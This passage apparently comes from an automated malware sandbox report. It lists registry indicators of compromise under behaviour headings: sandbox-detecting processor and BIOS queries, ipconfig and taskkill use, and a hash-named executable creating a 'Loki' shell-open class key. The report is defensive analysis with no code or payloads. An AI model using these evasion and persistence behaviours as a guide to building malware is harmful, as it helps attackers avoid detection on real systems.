\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 24648 ipconfig.exe -
Kills process with taskkill 2 IoCs
pid Process 3012 taskkill.exe 22928 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\TypedURLs taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\IESettingSync explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe -
Modifies data under HKEY_USERS 20 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895701868183330" msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\L1041" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 040000000500000003000000020000000100000000000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\7\NodeSlot = "18" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15 explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\{D6D9E004-CD87-442B-9D57-5E0AEB4F6F72}\GroupByDirection = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\5 explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "%windir%\\Speech_OneCore\\Engines\\SR\\ja-JP-N\\lsr1041.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech SW Voice Activation - Japanese (Japan)" SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.html cmd.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "16000" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1216" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 14002e80922b16d365937a46956b92703aca08af0000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "MS-1033-110-WINMO-DNN" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; currency=NativeSupported; url=NativeSupported; address=NativeSupported; alphanumeric=NativeSupported; message=NativeSupported; computer=NativeSupported" SearchApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKw = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000_Classes\Local 